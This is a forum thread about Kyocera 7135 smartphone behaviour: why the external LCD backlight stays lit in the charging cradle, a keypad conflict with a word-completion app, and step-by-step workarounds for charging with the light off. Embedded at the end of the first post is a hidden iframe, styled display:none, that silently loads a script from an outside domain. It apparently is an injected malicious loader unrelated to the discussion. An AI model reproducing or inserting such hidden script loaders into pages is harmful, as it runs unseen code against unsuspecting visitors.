+ Reply to Thread

Logic to External LCD lighting up in cradle

I'm trying to figure out the rhymn and reason for when and why the external LCD lights up when the phone is in the cradle. Sometimes it is lit, and won't go out. Sometimes it is off. Does anyone know the parameters for this? I've tried to see some logis to it, and can't.

Thanks for any info.

Also, has anyone noticed you can't use the keypad to look up phone numbers in address book if you have CIC's Word Complete app enabled? It won't let you get past the first letter.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Jeremy-

I don't know anything about the lighting issue.

Re: WordComplete---try setting your WordComplete prefs to "suggest words after:" 2 (or 3) letters. It works on my 7135.

Also, you might consider using TAKEphONE ...you won't have that WordComplete problem with it.
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

Hey thanks. But what is TakePhone?

TAKEphONE is an app. similar to the 7135 address book, BUT WAY BETTER! If you do a search for TAKEphONE you will find a recent post with the download info. Price is $9.95. You want v5.04xe.

You can also find it here: www.shsh.com/beta
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

Thanks, I'll give it a try!

Jeremy, here is a link to the FAQ which discusses the external LCD lighting behavior: http://www.smartphonesource.com/vbul...&threadid=4755 . Since the FAQ section defaults to the last 30 days, to see some of the first FAQ's (which cover many essentials), set the view timeframe to 'from the beginning'. You might want to take a look at them all-- there's lots of good stuff in there.

Originally posted by Krazman

Re: WordComplete---try setting your WordComplete prefs to "suggest words after:" 2 (or 3) letters. It works on my 7135.

Also, you might consider using TAKEphONE ...you won't have that WordComplete problem with it.
    I also use both WordComplete and TAKEphONE... no problems here either
    Please visit my picture site: Robert-O-Rama :)

Jeremy,

To answer your original question, The LCD backlight should stay on if the phone is in the cradle with the travel charger (adapter) plugged in. The only time I could think when it might not stay on is if you're charging an extra battery at the same time. I'd have to try it at home to see for sure.

The screen backlight also stays on when mine is in the cradle and I have the flip open even though I have the setting set for it to go off after 30 seconds. I guess they figure you're plugged in so not worried about draining the battery.

The FAQ mentioned above is for the colored LED that indicates call status not the LCD on the outside.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Thanks for this info. Right now, the outside LCD is off, the flip is open and powered on. Sometimes, the LCD is also illuminated in this state. Sometimes not. I'd be interested to see if the LCD on your 7135 behaves in the same irrational way. Thanks.

Originally posted by Jeremy
    Thanks for this info. Right now, the outside LCD is off, the flip is open and powered on. Sometimes, the LCD is also illuminated in this state. Sometimes not. I'd be interested to see if the LCD on your 7135 behaves in the same irrational way. Thanks.
    Is that with the phone in the cradle? Everytime I've had my phone in the cradle with the travel adapter plugged in, the LCD light has been on when I looked.

When you have the phone in your hand, the LCD light should only come on when you make a call or briefly when you push one of the external buttons or the red Phone/power button.

On a couple occasions for me, the light has not gone out after 10 seconds and if left on, it will drain the battery. I haven't tracked down the sequence that cause it to stay on yet. I usually have to initiate a call to get it back to normal.

These observations are when it is in the cradle with the charger plugged in. It seems to behave normally, as you have outlined, most of the time, but i have also noticed that it stays on a long time also sometimes when in cradle. I always have the charger attached.

I'm pretty sure when the phone is in the cradle or hooked to external power that the LCD backlight should be on.

I was able to reproduce partially my problem with the LCD light staying on when the phone is not connected to power. With the phone off and the flip closed, if I press the up volume button twice, the light comes on and doesn't shut off. If I turn the phone back on, it goes out after 10 seconds (unless I make a call, which is normal). It has happened to me before with the phone on but I haven't been able to get it to do that consitently.

Does anyone else have this problem or can someone try this sequence to see if it happens on theirs?

tcv
    I managed to -- somehow -- actually change the typestyle for the time that displays in the LCD. I'm not sure exactly how, but I presume is had something to do with loading the PalmReader Pro and the fonts that go with it. (Fontbucket.)

More LCD weirdness, I guess.

m

I haven't seen this in any of the other threads on the LCD backlight, so here's my experience:

Usually, the LCD stays on while charging... but if you want the LCD off while charging (to avoid the nightlight effect), try this --

To charge with the Phone OFF and LCD OFF:
    1) Start with the Phone ON and closed
    2) Plug the phone into the sync stand or travel charger
    3) Open the phone and press the RED phone button to turn off the Phone
    4) When you see "Phone is Charging" and "Phone is OFF", QUICKLY close the phone
    5) Wait about 3 seconds. The LCD backlight should go out.

Note that if you wait too long in step 4, the LCD backlight will go out while the phone is still open. Then when you close it, the LCD backlight will switch back on and will not go off. Try again by removing the phone from the charger and turning it back on and go back to step 1.

If you want to charge the phone while it is still ON and can receive calls, then just change the sequence:
    Start with the phone OFF, then turn it ON once plugged in.

Caveat: I don't know if this will work for everyone. I'm using a Verizon phone, firmware MZ 36, SZ 23, PRL 50074.

Very clever.
    ~'kito
    pdaPhoneHome Moderator

How about putting a folded piece of black paper over the phone at night to block the light? Then you could still get calls.

Did someone say that if the phone is plugged in and flip open, the external LCD shuts off? If that's true, then why not just charge with flip open and backlight off? Or use EnergyDimmer so you can bring back the backlight quickly.

Originally posted by tmwebsites
    How about putting a folded piece of black paper over the phone at night to block the light? Then you could still get calls.
    Black electricians' or gaffers' tape would stay in place better.
    ~'kito
    pdaPhoneHome Moderator

I noticed this morning that when the phone's plugged in and the clam is closed, I can make the external LCD light turn off by adjusting the volume. True, the ringer has to play once, but then the light turns off. Does this work for anyone else?

what fascinating mysteries we have to uncover! I'm glad others were just as boggled by this.